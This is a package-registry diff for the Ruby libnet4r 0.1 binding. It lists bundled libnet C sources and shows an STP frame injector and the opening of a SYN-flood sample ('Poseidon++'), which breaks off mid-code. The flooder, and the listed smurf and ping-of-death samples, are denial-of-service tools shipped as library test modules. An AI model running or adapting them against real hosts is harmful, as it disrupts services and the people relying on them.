libnet4r 0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/CHANGELOG +15 -0
- data/LICENSE +28 -0
- data/README +187 -0
- data/Rakefile +110 -0
- data/ext/extconf.rb +60 -0
- data/ext/libnet.c +705 -0
- data/ext/libnet_arp.c +152 -0
- data/ext/libnet_ethernet.c +115 -0
- data/ext/libnet_ipv4.c +140 -0
- data/ext/libnet_ipv6.c +138 -0
- data/ext/libnet_udp.c +112 -0
- data/ext/libnet_vlan.c +131 -0
- data/lib/libnet4r/header.rb +609 -0
- data/lib/libnet4r/helpers.rb +19 -0
- data/lib/libnet4r/libnet.rb +39 -0
- data/libnet/CVS/Entries +24 -0
- data/libnet/CVS/Repository +1 -0
- data/libnet/CVS/Root +1 -0
- data/libnet/Makefile.am +15 -0
- data/libnet/Makefile.am.common +10 -0
- data/libnet/Makefile.in +443 -0
- data/libnet/README +21 -0
- data/libnet/VERSION +1 -0
- data/libnet/acconfig.h +36 -0
- data/libnet/acinclude.m4 +463 -0
- data/libnet/aclocal.m4 +1337 -0
- data/libnet/autom4te.cache/CVS/Entries +1 -0
- data/libnet/autom4te.cache/CVS/Repository +1 -0
- data/libnet/autom4te.cache/CVS/Root +1 -0
- data/libnet/autom4te.cache/output.0 +6225 -0
- data/libnet/autom4te.cache/requests +111 -0
- data/libnet/autom4te.cache/traces.0 +272 -0
- data/libnet/config.guess +1314 -0
- data/libnet/config.sub +1410 -0
- data/libnet/configure +6225 -0
- data/libnet/configure.in +235 -0
- data/libnet/doc/BUGS +19 -0
- data/libnet/doc/CHANGELOG +527 -0
- data/libnet/doc/CONTRIB +53 -0
- data/libnet/doc/COPYING +31 -0
- data/libnet/doc/CVS/Entries +12 -0
- data/libnet/doc/CVS/Repository +1 -0
- data/libnet/doc/CVS/Root +1 -0
- data/libnet/doc/DESIGN_NOTES +134 -0
- data/libnet/doc/MIGRATION +172 -0
- data/libnet/doc/PACKET_BUILDING +161 -0
- data/libnet/doc/PORTED +45 -0
- data/libnet/doc/RAWSOCKET_NON_SEQUITUR +41 -0
- data/libnet/doc/TODO +96 -0
- data/libnet/doc/html/acconfig_8h-source.html +49 -0
- data/libnet/doc/html/annotated.html +17 -0
- data/libnet/doc/html/bpf_8h-source.html +277 -0
- data/libnet/doc/html/config_8h-source.html +125 -0
- data/libnet/doc/html/doxygen.css +169 -0
- data/libnet/doc/html/doxygen.png +0 -0
- data/libnet/doc/html/files.html +29 -0
- data/libnet/doc/html/functions.html +26 -0
- data/libnet/doc/html/functions_vars.html +26 -0
- data/libnet/doc/html/getopt_8h-source.html +97 -0
- data/libnet/doc/html/globals.html +219 -0
- data/libnet/doc/html/globals_defs.html +104 -0
- data/libnet/doc/html/globals_func.html +136 -0
- data/libnet/doc/html/gnuc_8h-source.html +56 -0
- data/libnet/doc/html/graph_legend.dot +22 -0
- data/libnet/doc/html/graph_legend.html +75 -0
- data/libnet/doc/html/ifaddrlist_8h-source.html +65 -0
- data/libnet/doc/html/in__systm_8h-source.html +90 -0
- data/libnet/doc/html/index.html +17 -0
- data/libnet/doc/html/libnet-asn1_8h-source.html +268 -0
- data/libnet/doc/html/libnet-functions_8h-source.html +742 -0
- data/libnet/doc/html/libnet-functions_8h.html +8844 -0
- data/libnet/doc/html/libnet-headers_8h-source.html +1655 -0
- data/libnet/doc/html/libnet-headers_8h.html +3053 -0
- data/libnet/doc/html/libnet-macros_8h-source.html +161 -0
- data/libnet/doc/html/libnet-macros_8h.html +358 -0
- data/libnet/doc/html/libnet-structures_8h-source.html +233 -0
- data/libnet/doc/html/libnet-types_8h-source.html +58 -0
- data/libnet/doc/html/libnet_8h-source.html +119 -0
- data/libnet/doc/html/libnet_8h.html +24 -0
- data/libnet/doc/html/structlibnet__802__1q__hdr.html +145 -0
- data/libnet/doc/html/structlibnet__802__1x__hdr.html +97 -0
- data/libnet/doc/libnet.doxygen.conf +1102 -0
- data/libnet/doc/man/CVS/Entries +1 -0
- data/libnet/doc/man/CVS/Repository +1 -0
- data/libnet/doc/man/CVS/Root +1 -0
- data/libnet/doc/man/man3/libnet-functions.h.3 +3136 -0
- data/libnet/doc/man/man3/libnet-headers.h.3 +1872 -0
- data/libnet/doc/man/man3/libnet-macros.h.3 +172 -0
- data/libnet/doc/man/man3/libnet.h.3 +17 -0
- data/libnet/doc/man/man3/libnet_802_1q_hdr.3 +53 -0
- data/libnet/doc/man/man3/libnet_802_1x_hdr.3 +41 -0
- data/libnet/include/CVS/Entries +10 -0
- data/libnet/include/CVS/Repository +1 -0
- data/libnet/include/CVS/Root +1 -0
- data/libnet/include/Makefile.am +7 -0
- data/libnet/include/Makefile.in +395 -0
- data/libnet/include/bpf.h +264 -0
- data/libnet/include/config.h.in +118 -0
- data/libnet/include/gnuc.h +43 -0
- data/libnet/include/ifaddrlist.h +52 -0
- data/libnet/include/libnet/CVS/Entries +9 -0
- data/libnet/include/libnet/CVS/Repository +1 -0
- data/libnet/include/libnet/CVS/Root +1 -0
- data/libnet/include/libnet/Makefile.am +12 -0
- data/libnet/include/libnet/Makefile.in +294 -0
- data/libnet/include/libnet/libnet-asn1.h +255 -0
- data/libnet/include/libnet/libnet-functions.h +2157 -0
- data/libnet/include/libnet/libnet-headers.h +1662 -0
- data/libnet/include/libnet/libnet-macros.h +186 -0
- data/libnet/include/libnet/libnet-structures.h +222 -0
- data/libnet/include/libnet/libnet-types.h +45 -0
- data/libnet/include/libnet.h.in +132 -0
- data/libnet/include/stamp-h.in +1 -0
- data/libnet/include/win32/CVS/Entries +5 -0
- data/libnet/include/win32/CVS/Repository +1 -0
- data/libnet/include/win32/CVS/Root +1 -0
- data/libnet/include/win32/config.h +112 -0
- data/libnet/include/win32/getopt.h +84 -0
- data/libnet/include/win32/in_systm.h +77 -0
- data/libnet/include/win32/libnet.h +106 -0
- data/libnet/install-sh +250 -0
- data/libnet/libnet-config.in +62 -0
- data/libnet/libnet.doxygen.conf +1102 -0
- data/libnet/man/CVS/Entries +1 -0
- data/libnet/man/CVS/Repository +1 -0
- data/libnet/man/CVS/Root +1 -0
- data/libnet/missing +283 -0
- data/libnet/mkinstalldirs +40 -0
- data/libnet/sample/CVS/Entries +47 -0
- data/libnet/sample/CVS/Repository +1 -0
- data/libnet/sample/CVS/Root +1 -0
- data/libnet/sample/Makefile.am +63 -0
- data/libnet/sample/Makefile.in +729 -0
- data/libnet/sample/arp-new.c +144 -0
- data/libnet/sample/arp.c +151 -0
- data/libnet/sample/bgp4_hdr.c +225 -0
- data/libnet/sample/bgp4_notification.c +242 -0
- data/libnet/sample/bgp4_open.c +266 -0
- data/libnet/sample/bgp4_update.c +337 -0
- data/libnet/sample/cdp.c +187 -0
- data/libnet/sample/dhcp_discover.c +257 -0
- data/libnet/sample/dns.c +260 -0
- data/libnet/sample/dot1x.c +113 -0
- data/libnet/sample/fddi_tcp1.c +213 -0
- data/libnet/sample/fddi_tcp2.c +209 -0
- data/libnet/sample/get_addr.c +112 -0
- data/libnet/sample/gre.c +410 -0
- data/libnet/sample/icmp6_echoreq.c +184 -0
- data/libnet/sample/icmp_echo_cq.c +201 -0
- data/libnet/sample/icmp_redirect.c +200 -0
- data/libnet/sample/icmp_timeexceed.c +190 -0
- data/libnet/sample/icmp_timestamp.c +157 -0
- data/libnet/sample/icmp_unreach.c +204 -0
- data/libnet/sample/ieee.c +177 -0
- data/libnet/sample/ip_link.c +201 -0
- data/libnet/sample/ip_raw.c +180 -0
- data/libnet/sample/isl.c +167 -0
- data/libnet/sample/libnet_test.h +60 -0
- data/libnet/sample/mpls.c +251 -0
- data/libnet/sample/ntp.c +193 -0
- data/libnet/sample/ospf_hello.c +179 -0
- data/libnet/sample/ospf_lsa.c +190 -0
- data/libnet/sample/ping_of_death.c +171 -0
- data/libnet/sample/rpc_tcp.c +214 -0
- data/libnet/sample/rpc_udp.c +213 -0
- data/libnet/sample/sebek.c +299 -0
- data/libnet/sample/smurf.c +194 -0
- data/libnet/sample/stp.c +227 -0
- data/libnet/sample/synflood.c +200 -0
- data/libnet/sample/synflood6.c +209 -0
- data/libnet/sample/synflood6_frag.c +234 -0
- data/libnet/sample/tcp1.c +227 -0
- data/libnet/sample/tcp2.c +192 -0
- data/libnet/sample/tftp.c +207 -0
- data/libnet/sample/tring_tcp1.c +214 -0
- data/libnet/sample/tring_tcp2.c +210 -0
- data/libnet/sample/udp1.c +223 -0
- data/libnet/sample/udp2.c +232 -0
- data/libnet/sample/win32/CVS/Entries +9 -0
- data/libnet/sample/win32/CVS/Repository +1 -0
- data/libnet/sample/win32/CVS/Root +1 -0
- data/libnet/sample/win32/arp/CVS/Entries +2 -0
- data/libnet/sample/win32/arp/CVS/Repository +1 -0
- data/libnet/sample/win32/arp/CVS/Root +1 -0
- data/libnet/sample/win32/arp/arp.vcproj +136 -0
- data/libnet/sample/win32/cdp/CVS/Entries +2 -0
- data/libnet/sample/win32/cdp/CVS/Repository +1 -0
- data/libnet/sample/win32/cdp/CVS/Root +1 -0
- data/libnet/sample/win32/cdp/cdp.vcproj +136 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Entries +2 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Repository +1 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Root +1 -0
- data/libnet/sample/win32/dhcp_discover/dhcp_discover.vcproj +139 -0
- data/libnet/sample/win32/dns/CVS/Entries +2 -0
- data/libnet/sample/win32/dns/CVS/Repository +1 -0
- data/libnet/sample/win32/dns/CVS/Root +1 -0
- data/libnet/sample/win32/dns/dns.vcproj +139 -0
- data/libnet/sample/win32/get_addr/CVS/Entries +2 -0
- data/libnet/sample/win32/get_addr/CVS/Repository +1 -0
- data/libnet/sample/win32/get_addr/CVS/Root +1 -0
- data/libnet/sample/win32/get_addr/get_addr.vcproj +139 -0
- data/libnet/sample/win32/getopt.c +121 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Entries +2 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Repository +1 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Root +1 -0
- data/libnet/sample/win32/icmp_echo_cq/icmp_echo_cq.vcproj +139 -0
- data/libnet/sample/win32/tcp1/CVS/Entries +2 -0
- data/libnet/sample/win32/tcp1/CVS/Repository +1 -0
- data/libnet/sample/win32/tcp1/CVS/Root +1 -0
- data/libnet/sample/win32/tcp1/tcp1.vcproj +142 -0
- data/libnet/sample/win32/udp1/CVS/Entries +3 -0
- data/libnet/sample/win32/udp1/CVS/Repository +1 -0
- data/libnet/sample/win32/udp1/CVS/Root +1 -0
- data/libnet/sample/win32/udp1/dns.vcproj +125 -0
- data/libnet/sample/win32/udp1/udp1.vcproj +139 -0
- data/libnet/src/CVS/Entries +60 -0
- data/libnet/src/CVS/Repository +1 -0
- data/libnet/src/CVS/Root +1 -0
- data/libnet/src/Makefile.am +71 -0
- data/libnet/src/Makefile.in +428 -0
- data/libnet/src/libnet_advanced.c +136 -0
- data/libnet/src/libnet_asn1.c +436 -0
- data/libnet/src/libnet_build_802.1q.c +115 -0
- data/libnet/src/libnet_build_802.1x.c +103 -0
- data/libnet/src/libnet_build_802.2.c +167 -0
- data/libnet/src/libnet_build_802.3.c +101 -0
- data/libnet/src/libnet_build_arp.c +169 -0
- data/libnet/src/libnet_build_bgp.c +350 -0
- data/libnet/src/libnet_build_cdp.c +191 -0
- data/libnet/src/libnet_build_data.c +90 -0
- data/libnet/src/libnet_build_dhcp.c +156 -0
- data/libnet/src/libnet_build_dns.c +129 -0
- data/libnet/src/libnet_build_ethernet.c +173 -0
- data/libnet/src/libnet_build_fddi.c +191 -0
- data/libnet/src/libnet_build_gre.c +427 -0
- data/libnet/src/libnet_build_icmp.c +437 -0
- data/libnet/src/libnet_build_igmp.c +112 -0
- data/libnet/src/libnet_build_ip.c +892 -0
- data/libnet/src/libnet_build_ipsec.c +232 -0
- data/libnet/src/libnet_build_isl.c +113 -0
- data/libnet/src/libnet_build_link.c +90 -0
- data/libnet/src/libnet_build_mpls.c +112 -0
- data/libnet/src/libnet_build_ntp.c +121 -0
- data/libnet/src/libnet_build_ospf.c +699 -0
- data/libnet/src/libnet_build_rip.c +108 -0
- data/libnet/src/libnet_build_rpc.c +138 -0
- data/libnet/src/libnet_build_sebek.c +108 -0
- data/libnet/src/libnet_build_snmp.c +52 -0
- data/libnet/src/libnet_build_stp.c +222 -0
- data/libnet/src/libnet_build_tcp.c +365 -0
- data/libnet/src/libnet_build_token_ring.c +193 -0
- data/libnet/src/libnet_build_udp.c +111 -0
- data/libnet/src/libnet_build_vrrp.c +117 -0
- data/libnet/src/libnet_checksum.c +376 -0
- data/libnet/src/libnet_cq.c +395 -0
- data/libnet/src/libnet_crc.c +113 -0
- data/libnet/src/libnet_dll.c +47 -0
- data/libnet/src/libnet_error.c +55 -0
- data/libnet/src/libnet_if_addr.c +415 -0
- data/libnet/src/libnet_init.c +234 -0
- data/libnet/src/libnet_internal.c +310 -0
- data/libnet/src/libnet_link_bpf.c +348 -0
- data/libnet/src/libnet_link_dlpi.c +785 -0
- data/libnet/src/libnet_link_linux.c +310 -0
- data/libnet/src/libnet_link_nit.c +125 -0
- data/libnet/src/libnet_link_none.c +66 -0
- data/libnet/src/libnet_link_pf.c +179 -0
- data/libnet/src/libnet_link_snit.c +149 -0
- data/libnet/src/libnet_link_snoop.c +166 -0
- data/libnet/src/libnet_link_win32.c +346 -0
- data/libnet/src/libnet_pblock.c +511 -0
- data/libnet/src/libnet_port_list.c +295 -0
- data/libnet/src/libnet_prand.c +106 -0
- data/libnet/src/libnet_raw.c +257 -0
- data/libnet/src/libnet_resolve.c +414 -0
- data/libnet/src/libnet_version.c +54 -0
- data/libnet/src/libnet_write.c +502 -0
- data/libnet/version.h.in +6 -0
- data/libnet/win32/CVS/Entries +15 -0
- data/libnet/win32/CVS/Repository +1 -0
- data/libnet/win32/CVS/Root +1 -0
- data/libnet/win32/Libnet-1.1.1-2002.sln +77 -0
- data/libnet/win32/Libnet-1.1.1-2003.ncb +0 -0
- data/libnet/win32/Libnet-1.1.1-2003.sln +84 -0
- data/libnet/win32/Libnet-1.1.1-2003.suo +0 -0
- data/libnet/win32/Libnet-1.1.1.vcproj +311 -0
- data/libnet/win32/Libnet-latest.ncb +0 -0
- data/libnet/win32/Libnet-latest.opt +0 -0
- data/libnet/win32/Libnet-latest.sln +77 -0
- data/libnet/win32/Libnet-latest.suo +0 -0
- data/libnet/win32/Libnet-latest.vcproj +311 -0
- data/libnet/win32/Libnet.dsp +337 -0
- data/libnet/win32/Libnet.dsw +32 -0
- data/libnet/win32/README.txt +57 -0
- data/libnet/win32/libnet_dll.def +164 -0
- data/test/tc_arp.rb +169 -0
- data/test/tc_class.rb +219 -0
- data/test/tc_ethernet.rb +97 -0
- data/test/tc_header.rb +163 -0
- data/test/tc_init.rb +25 -0
- data/test/tc_ipv4.rb +219 -0
- data/test/tc_ipv6.rb +235 -0
- data/test/tc_udp.rb +229 -0
- data/test/tc_vlan.rb +118 -0
- data/test/ts_all.rb +15 -0
- metadata +401 -0
data/libnet/sample/stp.c
ADDED
@@ -0,0 +1,227 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: stp.c,v 1.3 2004/01/21 19:01:29 mike Exp $
|
3
|
+
*
|
4
|
+
* libnet 1.1
|
5
|
+
* Build an STP frame
|
6
|
+
*
|
7
|
+
* Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
|
8
|
+
* All rights reserved.
|
9
|
+
*
|
10
|
+
* Redistribution and use in source and binary forms, with or without
|
11
|
+
* modification, are permitted provided that the following conditions
|
12
|
+
* are met:
|
13
|
+
* 1. Redistributions of source code must retain the above copyright
|
14
|
+
* notice, this list of conditions and the following disclaimer.
|
15
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
16
|
+
* notice, this list of conditions and the following disclaimer in the
|
17
|
+
* documentation and/or other materials provided with the distribution.
|
18
|
+
*
|
19
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
20
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
21
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
22
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
23
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
24
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
25
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
26
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
27
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
28
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
29
|
+
* SUCH DAMAGE.
|
30
|
+
*
|
31
|
+
*/
|
32
|
+
|
33
|
+
#if (HAVE_CONFIG_H)
|
34
|
+
#include "../include/config.h"
|
35
|
+
#endif
|
36
|
+
#include "./libnet_test.h"
|
37
|
+
|
38
|
+
#define CONF 1
|
39
|
+
#define TCN 2
|
40
|
+
|
41
|
+
int
|
42
|
+
main(int argc, char *argv[])
|
43
|
+
{
|
44
|
+
int c, len, type;
|
45
|
+
libnet_t *l;
|
46
|
+
libnet_ptag_t t;
|
47
|
+
u_char *dst, *src;
|
48
|
+
u_char rootid[8], bridgeid[8];
|
49
|
+
char *device = NULL;
|
50
|
+
char errbuf[LIBNET_ERRBUF_SIZE];
|
51
|
+
|
52
|
+
printf("libnet 1.1 packet shaping: [STP]\n");
|
53
|
+
|
54
|
+
device = NULL;
|
55
|
+
src = dst = NULL;
|
56
|
+
type = CONF;
|
57
|
+
while ((c = getopt(argc, argv, "cd:i:s:t")) != EOF)
|
58
|
+
{
|
59
|
+
switch (c)
|
60
|
+
{
|
61
|
+
case 'c':
|
62
|
+
type = CONF;
|
63
|
+
break;
|
64
|
+
case 'd':
|
65
|
+
dst = libnet_hex_aton(optarg, &len);
|
66
|
+
break;
|
67
|
+
case 'i':
|
68
|
+
device = optarg;
|
69
|
+
break;
|
70
|
+
case 's':
|
71
|
+
src = libnet_hex_aton(optarg, &len);
|
72
|
+
break;
|
73
|
+
case 't':
|
74
|
+
type = TCN;
|
75
|
+
break;
|
76
|
+
default:
|
77
|
+
usage(argv[0]);
|
78
|
+
exit(EXIT_FAILURE);
|
79
|
+
}
|
80
|
+
}
|
81
|
+
|
82
|
+
if (src == NULL || dst == NULL)
|
83
|
+
{
|
84
|
+
usage(argv[0]);
|
85
|
+
exit(EXIT_FAILURE);
|
86
|
+
}
|
87
|
+
|
88
|
+
/*
|
89
|
+
* Initialize the library. Root priviledges are required.
|
90
|
+
*/
|
91
|
+
l = libnet_init(
|
92
|
+
LIBNET_LINK, /* injection type */
|
93
|
+
device, /* network interface */
|
94
|
+
errbuf); /* errbuf */
|
95
|
+
|
96
|
+
if (l == NULL)
|
97
|
+
{
|
98
|
+
fprintf(stderr, "libnet_init() failed: %s", errbuf);
|
99
|
+
exit(EXIT_FAILURE);
|
100
|
+
}
|
101
|
+
|
102
|
+
if (type == CONF)
|
103
|
+
{
|
104
|
+
rootid[0] = 0x80;
|
105
|
+
rootid[1] = 0x00;
|
106
|
+
rootid[2] = 0x00;
|
107
|
+
rootid[3] = 0x07;
|
108
|
+
rootid[4] = 0xec;
|
109
|
+
rootid[5] = 0xae;
|
110
|
+
rootid[6] = 0x30;
|
111
|
+
rootid[7] = 0x41;
|
112
|
+
|
113
|
+
bridgeid[0] = 0x80;
|
114
|
+
bridgeid[1] = 0x00;
|
115
|
+
bridgeid[2] = 0x00;
|
116
|
+
bridgeid[3] = 0x07;
|
117
|
+
bridgeid[4] = 0xec;
|
118
|
+
bridgeid[5] = 0xae;
|
119
|
+
bridgeid[6] = 0x30;
|
120
|
+
bridgeid[7] = 0x41;
|
121
|
+
|
122
|
+
t = libnet_build_stp_conf(
|
123
|
+
0x0000, /* protocol id */
|
124
|
+
0x00, /* protocol version */
|
125
|
+
0x00, /* BPDU type */
|
126
|
+
0x00, /* BPDU flags */
|
127
|
+
rootid, /* root id */
|
128
|
+
0x00000001, /* root path cost */
|
129
|
+
bridgeid, /* bridge id */
|
130
|
+
0x8002, /* port id */
|
131
|
+
0x00, /* message age */
|
132
|
+
0x0014, /* max age */
|
133
|
+
0x0002, /* hello time */
|
134
|
+
0x000f, /* forward delay */
|
135
|
+
NULL, /* payload */
|
136
|
+
0, /* payload size */
|
137
|
+
l, /* libnet handle */
|
138
|
+
0); /* libnet id */
|
139
|
+
if (t == -1)
|
140
|
+
{
|
141
|
+
fprintf(stderr, "Can't build STP conf header: %s\n",
|
142
|
+
libnet_geterror(l));
|
143
|
+
goto bad;
|
144
|
+
}
|
145
|
+
}
|
146
|
+
else
|
147
|
+
{
|
148
|
+
t = libnet_build_stp_tcn(
|
149
|
+
0x0000, /* protocol id */
|
150
|
+
0x00, /* protocol version */
|
151
|
+
0x80, /* BPDU type */
|
152
|
+
NULL, /* payload */
|
153
|
+
0, /* payload size */
|
154
|
+
l, /* libnet handle */
|
155
|
+
0); /* libnet id */
|
156
|
+
if (t == -1)
|
157
|
+
{
|
158
|
+
fprintf(stderr, "Can't build STP tcn header: %s\n",
|
159
|
+
libnet_geterror(l));
|
160
|
+
goto bad;
|
161
|
+
}
|
162
|
+
}
|
163
|
+
|
164
|
+
t = libnet_build_802_2(
|
165
|
+
LIBNET_SAP_STP, /* DSAP */
|
166
|
+
LIBNET_SAP_STP, /* SSAP */
|
167
|
+
0x03, /* control */
|
168
|
+
NULL, /* payload */
|
169
|
+
0, /* payload size */
|
170
|
+
l, /* libnet handle */
|
171
|
+
0); /* libnet id */
|
172
|
+
if (t == -1)
|
173
|
+
{
|
174
|
+
fprintf(stderr, "Can't build ethernet header: %s\n",
|
175
|
+
libnet_geterror(l));
|
176
|
+
goto bad;
|
177
|
+
}
|
178
|
+
|
179
|
+
t = libnet_build_802_3(
|
180
|
+
dst, /* ethernet destination */
|
181
|
+
src, /* ethernet source */
|
182
|
+
LIBNET_802_2_H + ((type == CONF) ? LIBNET_STP_CONF_H :
|
183
|
+
LIBNET_STP_TCN_H), /* frame size */
|
184
|
+
NULL, /* payload */
|
185
|
+
0, /* payload size */
|
186
|
+
l, /* libnet handle */
|
187
|
+
0); /* libnet id */
|
188
|
+
if (t == -1)
|
189
|
+
{
|
190
|
+
fprintf(stderr, "Can't build ethernet header: %s\n",
|
191
|
+
libnet_geterror(l));
|
192
|
+
goto bad;
|
193
|
+
}
|
194
|
+
/*
|
195
|
+
* Write it to the wire.
|
196
|
+
*/
|
197
|
+
c = libnet_write(l);
|
198
|
+
|
199
|
+
if (c == -1)
|
200
|
+
{
|
201
|
+
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
|
202
|
+
goto bad;
|
203
|
+
}
|
204
|
+
else
|
205
|
+
{
|
206
|
+
fprintf(stderr, "Wrote %d byte STP packet; check the wire.\n", c);
|
207
|
+
}
|
208
|
+
free(dst);
|
209
|
+
free(src);
|
210
|
+
libnet_destroy(l);
|
211
|
+
return (EXIT_SUCCESS);
|
212
|
+
bad:
|
213
|
+
free(dst);
|
214
|
+
free(src);
|
215
|
+
libnet_destroy(l);
|
216
|
+
return (EXIT_FAILURE);
|
217
|
+
}
|
218
|
+
|
219
|
+
|
220
|
+
void
|
221
|
+
usage(char *name)
|
222
|
+
{
|
223
|
+
fprintf(stderr, "usage %s -d dst -s src -t -c [-i interface]\n",
|
224
|
+
name);
|
225
|
+
}
|
226
|
+
|
227
|
+
/* EOF */
|
@@ -0,0 +1,200 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: synflood.c,v 1.1.1.1 2003/06/26 21:55:11 route Exp $
|
3
|
+
*
|
4
|
+
* Poseidon++ (c) 1996 - 2003 Mike D. Schiffman <mike@infonexus.com>
|
5
|
+
* SYN flooder rewritten for no good reason. Again as libnet test module.
|
6
|
+
* Again for libnet 1.1.
|
7
|
+
* All rights reserved.
|
8
|
+
*
|
9
|
+
* Redistribution and use in source and binary forms, with or without
|
10
|
+
* modification, are permitted provided that the following conditions
|
11
|
+
* are met:
|
12
|
+
* 1. Redistributions of source code must retain the above copyright
|
13
|
+
* notice, this list of conditions and the following disclaimer.
|
14
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
15
|
+
* notice, this list of conditions and the following disclaimer in the
|
16
|
+
* documentation and/or other materials provided with the distribution.
|
17
|
+
*
|
18
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
19
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
20
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
21
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
22
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
23
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
24
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
25
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
26
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
27
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
28
|
+
* SUCH DAMAGE.
|
29
|
+
*
|
30
|
+
*/
|
31
|
+
|
32
|
+
#if (HAVE_CONFIG_H)
|
33
|
+
#include "../include/config.h"
|
34
|
+
#endif
|
35
|
+
#include "./libnet_test.h"
|
36
|
+
|
37
|
+
struct t_pack
|
38
|
+
{
|
39
|
+
struct libnet_ipv4_hdr ip;
|
40
|
+
struct libnet_tcp_hdr tcp;
|
41
|
+
};
|
42
|
+
|
43
|
+
|
44
|
+
int
|
45
|
+
main(int argc, char **argv)
|
46
|
+
{
|
47
|
+
u_long dst_ip = 0;
|
48
|
+
u_long src_ip = 0;
|
49
|
+
u_short dst_prt = 0;
|
50
|
+
u_short src_prt = 0;
|
51
|
+
libnet_t *l;
|
52
|
+
libnet_ptag_t t;
|
53
|
+
u_char *cp;
|
54
|
+
char errbuf[LIBNET_ERRBUF_SIZE];
|
55
|
+
int i, c, packet_amt, burst_int, burst_amt, build_ip;
|
56
|
+
|
57
|
+
packet_amt = 0;
|
58
|
+
burst_int = 0;
|
59
|
+
burst_amt = 1;
|
60
|
+
|
61
|
+
printf("libnet 1.1 syn flooding: TCP[raw]\n");
|
62
|
+
|
63
|
+
/*
|
64
|
+
* Initialize the library. Root priviledges are required.
|
65
|
+
*/
|
66
|
+
l = libnet_init(
|
67
|
+
LIBNET_RAW4, /* injection type */
|
68
|
+
NULL, /* network interface */
|
69
|
+
errbuf); /* error buffer */
|
70
|
+
|
71
|
+
if (l == NULL)
|
72
|
+
{
|
73
|
+
fprintf(stderr, "libnet_init() failed: %s", errbuf);
|
74
|
+
exit(EXIT_FAILURE);
|
75
|
+
}
|
76
|
+
|
77
|
+
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
|
78
|
+
{
|
79
|
+
switch (c)
|
80
|
+
{
|
81
|
+
/*
|
82
|
+
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
|
83
|
+
* point cp to the last dot of the IP address/port string and
|
84
|
+
* then seperate them with a NULL byte. The optarg now points to
|
85
|
+
* just the IP address, and cp points to the port.
|
86
|
+
*/
|
87
|
+
case 't':
|
88
|
+
if (!(cp = strrchr(optarg, '.')))
|
89
|
+
{
|
90
|
+
usage(argv[0]);
|
91
|
+
exit(EXIT_FAILURE);
|
92
|
+
}
|
93
|
+
*cp++ = 0;
|
94
|
+
dst_prt = (u_short)atoi(cp);
|
95
|
+
if ((dst_ip = libnet_name2addr4(l, optarg, 1)) == -1)
|
96
|
+
{
|
97
|
+
fprintf(stderr, "Bad IP address: %s\n", optarg);
|
98
|
+
exit(EXIT_FAILURE);
|
99
|
+
}
|
100
|
+
break;
|
101
|
+
case 'a':
|
102
|
+
packet_amt = atoi(optarg);
|
103
|
+
break;
|
104
|
+
case 'i':
|
105
|
+
burst_int = atoi(optarg);
|
106
|
+
break;
|
107
|
+
case 'b':
|
108
|
+
burst_amt = atoi(optarg);
|
109
|
+
break;
|
110
|
+
default:
|
111
|
+
usage(argv[0]);
|
112
|
+
exit(EXIT_FAILURE);
|
113
|
+
}
|
114
|
+
}
|
115
|
+
|
116
|
+
if (!dst_prt || !dst_ip || !packet_amt)
|
117
|
+
{
|
118
|
+
usage(argv[0]);
|
119
|
+
exit(EXIT_FAILURE);
|
120
|
+
}
|
121
|
+
|
122
|
+
libnet_seed_prand(l);
|
123
|
+
|
124
|
+
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
|
125
|
+
{
|
126
|
+
for (i = 0; i < packet_amt; i++)
|
127
|
+
{
|
128
|
+
t = libnet_build_tcp(
|
129
|
+
src_prt = libnet_get_prand(LIBNET_PRu16),
|
130
|
+
